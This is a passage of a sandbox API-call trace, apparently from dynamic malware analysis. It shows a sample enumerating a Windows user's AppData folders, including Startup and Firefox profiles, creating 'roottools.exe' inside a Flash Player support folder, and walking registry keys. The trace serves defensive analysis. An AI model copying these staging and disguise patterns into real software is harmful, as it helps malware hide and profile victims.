(pszFile="Me7y1usyGmJu.flv.lnk", pszSpec="*") returned 1 [0083.638] PathMatchSpecW (pszFile="MexIfyKM-sbW8O.lnk", pszSpec="*") returned 1 [0083.638] PathMatchSpecW (pszFile="mtkGNF4Nxp1Jq.lnk", pszSpec="*") returned 1 [0083.638] PathMatchSpecW (pszFile="My Music.lnk", pszSpec="*") returned 1 [0083.638] PathMatchSpecW (pszFile="My Pictures.lnk", pszSpec="*") returned 1 [0083.638] PathMatchSpecW (pszFile="My Videos.lnk", pszSpec="*") returned 1 [0083.638] PathMatchSpecW (pszFile="NDKwV1zojdnIvD.lnk", pszSpec="*") returned 1 [0083.638] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.638] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.638] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.639] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.639] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.639] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.639] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\*", lpFindFileData=0x18c738 | out: lpFindFileData=0x18c738) returned 0x586ca0 [0083.639] FindClose (in: hFindFile=0x586ca0 | out: hFindFile=0x586ca0) returned 1 [0083.640] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\*", lpFindFileData=0x18c738 | out: lpFindFileData=0x18c738) returned 0x586ca0 [0083.640] FindClose (in: hFindFile=0x586ca0 | out: hFindFile=0x586ca0) returned 1 [0083.641] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.641] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.641] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.641] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.641] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.641] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.641] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.641] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.641] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.641] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.641] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.641] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.642] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.642] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.642] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Word\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.642] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.642] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.642] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.642] FindClose (in: hFindFile=0x586b60 | out: hFindFile=0x586b60) returned 1 [0083.642] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\*", lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 0x586b60 [0083.642] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Extensions\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.642] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.642] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.642] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.642] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.643] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.643] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.643] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.643] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.644] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.644] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.644] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.644] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\*", lpFindFileData=0x18c738 | out: lpFindFileData=0x18c738) returned 0x586ca0 [0083.644] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\*", lpFindFileData=0x18c2b0 | out: lpFindFileData=0x18c2b0) returned 0x586ce0 [0083.644] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\*", lpFindFileData=0x18be28 | out: lpFindFileData=0x18be28) returned 0x586d20 [0083.644] FindClose (in: hFindFile=0x586d20 | out: hFindFile=0x586d20) returned 1 [0083.644] FindClose (in: hFindFile=0x586ce0 | out: hFindFile=0x586ce0) returned 1 [0083.644] FindClose (in: hFindFile=0x586ca0 | out: hFindFile=0x586ca0) returned 1 [0083.644] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.644] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\minidumps\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.644] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.644] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.645] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\changes\\*", lpFindFileData=0x18c738 | out: lpFindFileData=0x18c738) returned 0x586ca0 [0083.645] FindClose (in: hFindFile=0x586ca0 | out: hFindFile=0x586ca0) returned 1 [0083.645] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\failed\\*", lpFindFileData=0x18c738 | out: lpFindFileData=0x18c738) returned 0x586ca0 [0083.645] FindClose (in: hFindFile=0x586ca0 | out: hFindFile=0x586ca0) returned 1 [0083.645] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\toFetch\\*", lpFindFileData=0x18c738 | out: lpFindFileData=0x18c738) returned 0x586ca0 [0083.645] FindClose (in: hFindFile=0x586ca0 | out: hFindFile=0x586ca0) returned 1 [0083.645] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.645] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.645] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.645] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.645] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.645] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.645] FindClose (in: hFindFile=0x586b60 | out: hFindFile=0x586b60) returned 1 [0083.645] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype\\*", lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 0x586b60 [0083.646] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype\\RootTools\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.646] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.646] FindClose (in: hFindFile=0x586b60 | out: hFindFile=0x586b60) returned 1 [0083.646] FindClose (in: hFindFile=0x586b20 | out: hFindFile=0x586b20) returned 1 [0083.646] PathFindExtensionW (pszPath="roottools.conf") returned=".conf" [0083.646] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x148 [0083.646] CloseHandle (hObject=0x148) returned 1 [0083.647] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0xd, lpSecurityAttributes=0x0, phkResult=0x18eb28, lpdwDisposition=0x0 | out: phkResult=0x18eb28*=0x148, lpdwDisposition=0x0) returned 0x0 [0083.647] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.647] RegEnumKeyW (in: hKey=0x148, dwIndex=0x2e, lpName=0x18eb64, cchName=0xa | out: lpName="Windows") returned 0x0 [0083.647] RegCreateKeyExW (in: hKey=0x148, lpSubKey="Windows", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x18eb24, lpdwDisposition=0x0 | out: phkResult=0x18eb24*=0x178, lpdwDisposition=0x0) returned 0x0 [0083.647] RegCloseKey (hKey=0x178) returned 0x0 [0083.647] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.647] RegEnumKeyW (in: hKey=0x148, dwIndex=0x1d, lpName=0x18eb64, cchName=0xa | out: lpName="Office") returned 0x0 [0083.647] RegCreateKeyExW (in: hKey=0x148, lpSubKey="Office", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x18eb24, lpdwDisposition=0x0 | out: phkResult=0x18eb24*=0x178, lpdwDisposition=0x0) returned 0x0 [0083.647] RegCloseKey (hKey=0x178) returned 0x0 [0083.647] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.647] RegEnumKeyW (in: hKey=0x148, dwIndex=0x22, lpName=0x18eb64, cchName=0xa | out: lpName="") returned 0xea [0083.647] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.647] RegEnumKeyW (in: hKey=0x148, dwIndex=0x31, lpName=0x18eb64, cchName=0xa | out: lpName="") returned 0xea [0083.647] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.647] RegEnumKeyW (in: hKey=0x148, dwIndex=0xd, lpName=0x18eb64, cchName=0xa | out: lpName="GDIPlus") returned 0x0 [0083.647] RegCreateKeyExW (in: hKey=0x148, lpSubKey="GDIPlus", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x18eb24, lpdwDisposition=0x0 | out: phkResult=0x18eb24*=0x178, lpdwDisposition=0x0) returned 0x0 [0083.647] RegCloseKey (hKey=0x178) returned 0x0 [0083.647] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.647] RegEnumKeyW (in: hKey=0x148, dwIndex=0x4, lpName=0x18eb64, cchName=0xa | out: lpName="") returned 0xea [0083.647] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.647] RegEnumKeyW (in: hKey=0x148, dwIndex=0x5, lpName=0x18eb64, cchName=0xa | out: lpName="") returned 0xea [0083.648] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.648] RegEnumKeyW (in: hKey=0x148, dwIndex=0xd, lpName=0x18eb64, cchName=0xa | out: lpName="GDIPlus") returned 0x0 [0083.648] RegCreateKeyExW (in: hKey=0x148, lpSubKey="GDIPlus", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x18eb24, lpdwDisposition=0x0 | out: phkResult=0x18eb24*=0x178, lpdwDisposition=0x0) returned 0x0 [0083.648] RegCloseKey (hKey=0x178) returned 0x0 [0083.648] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.648] RegEnumKeyW (in: hKey=0x148, dwIndex=0x29, lpName=0x18eb64, cchName=0xa | out: lpName="") returned 0xea [0083.648] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.648] RegEnumKeyW (in: hKey=0x148, dwIndex=0x19, lpName=0x18eb64, cchName=0xa | out: lpName="MSDAIPP") returned 0x0 [0083.648] RegCreateKeyExW (in: hKey=0x148, lpSubKey="MSDAIPP", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x18eb24, lpdwDisposition=0x0 | out: phkResult=0x18eb24*=0x178, lpdwDisposition=0x0) returned 0x0 [0083.648] RegCloseKey (hKey=0x178) returned 0x0 [0083.648] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.648] RegEnumKeyW (in: hKey=0x148, dwIndex=0xe, lpName=0x18eb64, cchName=0xa | out: lpName="IAM") returned 0x0 [0083.648] RegCreateKeyExW (in: hKey=0x148, lpSubKey="IAM", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x18eb24, lpdwDisposition=0x0 | out: phkResult=0x18eb24*=0x178, lpdwDisposition=0x0) returned 0x0 [0083.648] RegCloseKey (hKey=0x178) returned 0x0 [0083.648] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.648] RegEnumKeyW (in: hKey=0x148, dwIndex=0x20, lpName=0x18eb64, cchName=0xa | out: lpName="") returned 0xea [0083.648] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.648] RegEnumKeyW (in: hKey=0x148, dwIndex=0x35, lpName=0x18eb64, cchName=0xa | out: lpName="") returned 0xea [0083.648] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.648] RegEnumKeyW (in: hKey=0x148, dwIndex=0x1e, lpName=0x18eb64, cchName=0xa | out: lpName="OneDrive") returned 0x0 [0083.648] RegCreateKeyExW (in: hKey=0x148, lpSubKey="OneDrive", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x18eb24, lpdwDisposition=0x0 | out: phkResult=0x18eb24*=0x178, lpdwDisposition=0x0) returned 0x0 [0083.648] RegCloseKey (hKey=0x178) returned 0x0 [0083.648] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.648] RegEnumKeyW (in: hKey=0x148, dwIndex=0x7, lpName=0x18eb64, cchName=0xa | out: lpName="Direct3D") returned 0x0 [0083.648] RegCreateKeyExW (in: hKey=0x148, lpSubKey="Direct3D", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x18eb24, lpdwDisposition=0x0 | out: phkResult=0x18eb24*=0x178, lpdwDisposition=0x0) returned 0x0 [0083.648] RegCloseKey (hKey=0x178) returned 0x0 [0083.649] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.649] RegEnumKeyW (in: hKey=0x148, dwIndex=0x4, lpName=0x18eb64, cchName=0xa | out: lpName="") returned 0xea [0083.649] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, 